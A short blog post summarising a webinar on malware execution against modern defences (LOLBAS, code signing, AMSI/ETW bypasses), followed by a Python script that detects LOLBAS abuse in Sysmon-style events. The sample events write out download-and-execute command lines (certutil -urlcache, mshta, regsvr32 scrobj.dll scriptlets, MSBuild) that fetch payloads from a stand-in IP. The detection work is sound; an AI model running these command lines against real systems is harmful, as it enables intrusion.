December 3

Webinar takeaway: Move Aside Script Kiddies: Malware Execution in the Age of Advanced Defenses



My key takeaways

  • it’s getting harder to execute malware in a lot of environments, partly due to endpoint maturity
  • 3 parts of an assumed-compromise engagement: privilege escalation, lateral movement, sensitive data access
  • Win10 is safer than ever; Windows Defender has also improved
  • defense vendors have signatures for almost all Metasploit-generated machine code
  • nowadays you can’t use a commodity framework and get away with it as an attacker/red teamer
  • code signing also becomes relevant for red teamers to get malware to run
  • living off the land becomes more and more mandatory (LOLBAS)
  • Best EDR? Manually…!
  • "blinding the defenders": AMSI and ETW bypasses
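The LOLBAS point above is the one a defender can act on directly: if attackers must live off the land, the detection surface moves from file signatures to the command lines of signed Windows binaries. The following is an added example (my own, not from the webinar or the post) that runs a handful of LOLBAS command-line rules over constructed Sysmon Event ID 1 style records. The events, IP addresses, paths, and rule names are all assumptions made up for the example; the patterns (certutil -urlcache, mshta with a URL, regsvr32 /i:http with scrobj.dll, rundll32 javascript:, MSBuild on a project file in a user-writable path) are well-known LOLBAS techniques.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation),
# reduced to the fields the rules need. These are not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/payload.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://198.51.100.7/a.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.csproj",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign administrative use of the same binaries; must not fire.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\root.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.sln /t:Build",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"},
]

# (rule name, regex on Image, regex on CommandLine). All matched case-insensitively.
# Each rule keys on the abusive argument pattern, not on the binary alone, since the
# binary itself is signed, legitimate and frequently used by admins.
LOLBAS_RULES = [
    ("certutil remote download", r"\\certutil\.exe$", r"(-urlcache|-verifyctl)\b.*https?://"),
    ("mshta remote or inline script", r"\\mshta\.exe$", r"https?://|javascript:|vbscript:"),
    ("regsvr32 scriptlet (scrobj.dll)", r"\\regsvr32\.exe$", r"/i:\S*https?://|scrobj\.dll"),
    ("rundll32 inline script", r"\\rundll32\.exe$", r"javascript:|vbscript:"),
    ("msbuild from user-writable path", r"\\msbuild\.exe$",
     r"\\(temp|appdata|public|downloads)\\.*\.(csproj|proj|xml)\b"),
]

# Parents that should never be spawning LOLBAS binaries on a workstation.
OFFICE_PARENT = re.compile(r"\\(winword|excel|powerpnt|outlook)\.exe$", re.IGNORECASE)


def match_lolbas(event):
    """Return the names of every rule the event satisfies (empty list if none)."""
    hits = []
    for name, image_re, cmd_re in LOLBAS_RULES:
        if (re.search(image_re, event["Image"], re.IGNORECASE)
                and re.search(cmd_re, event["CommandLine"], re.IGNORECASE)):
            hits.append(name)
    return hits


def severity(event):
    """Escalate when the parent is an Office application (macro/phishing delivery)."""
    return "high" if OFFICE_PARENT.search(event["ParentImage"]) else "medium"


def triage(events):
    """Run all rules over a batch of events; one finding per (event, rule) pair."""
    findings = []
    for i, ev in enumerate(events):
        for rule in match_lolbas(ev):
            findings.append({"index": i, "rule": rule, "severity": severity(ev),
                             "command": ev["CommandLine"]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] event {f['index']}: {f['rule']}: {f['command']}")
```

The rules deliberately require an argument pattern on top of the binary name; alerting on every certutil or MSBuild execution is what makes LOLBAS detections noisy enough to be tuned out. Against real Sysmon or EDR data the same logic applies per process-creation event, with parent-process context used to raise severity rather than as the sole trigger.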

Tags

malware, red teaming, reverse shell

